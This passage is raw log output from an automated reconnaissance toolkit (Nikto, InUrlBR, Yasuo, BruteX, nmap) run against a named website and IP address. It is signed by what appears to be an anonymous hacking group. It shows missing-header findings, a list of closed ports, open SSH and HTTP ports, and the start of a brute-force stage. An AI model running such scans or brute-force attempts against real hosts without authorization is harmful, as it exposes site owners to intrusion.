3521. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
3522. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
3523. + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
3524. + Scan terminated: 9 error(s) and 4 item(s) reported on remote host
3525. + End Time: 2017-10-01 20:35:56 (GMT-4) (331 seconds)
3526. ---------------------------------------------------------------------------
3527. + 1 host(s) tested
3528. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
3529. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/video1.school-models.net-port80.jpg
3530. + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
3531. + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
3532.  
3533. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
3534. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
3535. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
3536. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
3537. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
3538. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
3539. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
3540.  
3541. __[ ! ] Neither war between hackers, nor peace for the system.
3542. __[ ! ] http://blog.inurl.com.br
3543. __[ ! ] http://fb.com/InurlBrasil
3544. __[ ! ] http://twitter.com/@googleinurl
3545. __[ ! ] http://github.com/googleinurl
3546. __[ ! ] Current PHP version::[ 7.0.22-3 ]
3547. __[ ! ] Current script owner::[ root ]
3548. __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
3549. __[ ! ] Current pwd::[ /usr/share/sniper ]
3550. __[ ! ] Help: php inurlbr.php --help
3551. ------------------------------------------------------------------------------------------------------------------------
3552.  
3553. [ ! ] Starting SCANNER INURLBR 2.1 at [01-10-2017 21:48:25]
3554. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
3555. It is the end user's responsibility to obey all applicable local, state and federal laws.
3556. Developers assume no liability and are not responsible for any misuse or damage caused by this program
3557.  
3558. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-video1.school-models.net.txt ]
3559. [ INFO ][ DORK ]::[ site:video1.school-models.net ]
3560. [ INFO ][ SEARCHING ]:: {
3561. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.vc ]
3562.  
3563. [ INFO ][ SEARCHING ]::
3564. -[:::]
3565. [ INFO ][ ENGINE ]::[ GOOGLE API ]
3566.  
3567. [ INFO ][ SEARCHING ]::
3568. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3569. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.ly ID: 012873187529719969291:yexdhbzntue ]
3570.  
3571. [ INFO ][ SEARCHING ]::
3572. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3573.  
3574. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
3575. [ INFO ] Not a satisfactory result was found!
3576.  
3577.  
3578. [ INFO ] [ Shutting down ]
3579. [ INFO ] [ End of process INURLBR at [01-10-2017 21:48:35]
3580. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3581. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-video1.school-models.net.txt ]
3582. |_________________________________________________________________________________________
3583.  
3584. \_________________________________________________________________________________________/
3585.  
3586. + -- --=[Port 110 closed... skipping.
3587. + -- --=[Port 111 closed... skipping.
3588. + -- --=[Port 135 closed... skipping.
3589. + -- --=[Port 139 closed... skipping.
3590. + -- --=[Port 161 closed... skipping.
3591. + -- --=[Port 162 closed... skipping.
3592. + -- --=[Port 389 closed... skipping.
3593. + -- --=[Port 443 closed... skipping.
3594. + -- --=[Port 445 closed... skipping.
3595. + -- --=[Port 512 closed... skipping.
3596. + -- --=[Port 513 closed... skipping.
3597. + -- --=[Port 514 closed... skipping.
3598. + -- --=[Port 623 closed... skipping.
3599. + -- --=[Port 624 closed... skipping.
3600. + -- --=[Port 1099 closed... skipping.
3601. + -- --=[Port 1433 closed... skipping.
3602. + -- --=[Port 2049 closed... skipping.
3603. + -- --=[Port 2121 closed... skipping.
3604. + -- --=[Port 3306 closed... skipping.
3605. + -- --=[Port 3310 closed... skipping.
3606. + -- --=[Port 3128 closed... skipping.
3607. + -- --=[Port 3389 closed... skipping.
3608. + -- --=[Port 3632 closed... skipping.
3609. + -- --=[Port 4443 closed... skipping.
3610. + -- --=[Port 5432 closed... skipping.
3611. + -- --=[Port 5800 closed... skipping.
3612. + -- --=[Port 5900 closed... skipping.
3613. + -- --=[Port 5984 closed... skipping.
3614. + -- --=[Port 6000 closed... skipping.
3615. + -- --=[Port 6667 closed... skipping.
3616. + -- --=[Port 8000 closed... skipping.
3617. + -- --=[Port 8100 closed... skipping.
3618. + -- --=[Port 8080 closed... skipping.
3619. + -- --=[Port 8180 closed... skipping.
3620. + -- --=[Port 8443 closed... skipping.
3621. + -- --=[Port 8888 closed... skipping.
3622. + -- --=[Port 10000 closed... skipping.
3623. + -- --=[Port 16992 closed... skipping.
3624. + -- --=[Port 27017 closed... skipping.
3625. + -- --=[Port 27018 closed... skipping.
3626. + -- --=[Port 27019 closed... skipping.
3627. + -- --=[Port 28017 closed... skipping.
3628. + -- --=[Port 49152 closed... skipping.
3629. + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
3630. #######################################################################################################################################
3631. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
3632. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
3633. `888. .8' .88888. Y88bo. 888 8 888 888
3634. `888.8' .8' `888. `ZY8888o. 888 8 888 888
3635. `888' .88ooo8888. `0Y88b 888 8 888 888
3636. 888 .8' `888. oo .d8P `88. .8' `88b d88'
3637. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
3638. Welcome to Yasuo v2.3
3639. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
3640. #######################################################################################################################################
3641.  
3642. I, [2017-10-01T21:48:38.866845 #12937] INFO -- : Initiating port scan
3643. I, [2017-10-01T21:53:44.060468 #12937] INFO -- : Using nmap scan output file logs/nmap_output_2017-10-01_21-48-38.xml
3644. W, [2017-10-01T21:53:44.087772 #12937] WARN -- : Yasuo did not find any potential hosts to enumerate
3645. + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
3646. + -- ----------------------------=[Running Brute Force]=--------------------- -- +
3647. __________ __ ____ ___
3648. \______ \_______ __ ___/ |_ ____ \ \/ /
3649. | | _/\_ __ \ | \ __\/ __ \ \ /
3650. | | \ | | \/ | /| | \ ___/ / \
3651. |______ / |__| |____/ |__| \___ >___/\ \
3652. \/ \/ \_/
3653.  
3654. + -- --=[BruteX v1.7 by 1N3
3655. + -- --=[http://crowdshield.com
3656.  
3657.  
3658. ################################### Running Port Scan ##############################
3659.  
3660. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-01 21:53 EDT
3661. Nmap scan report for video1.school-models.net (45.123.190.187)
3662. Host is up (0.22s latency).
3663. Not shown: 21 closed ports, 3 filtered ports
3664. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
3665. PORT STATE SERVICE
3666. 22/tcp open ssh
3667. 80/tcp open http
3668.  
3669. Nmap done: 1 IP address (1 host up) scanned in 14.13 seconds
3670. ##############################################################################################################################################################################################################################################################################
3671. HunterUnit JTSEC full Recon Anonymous #2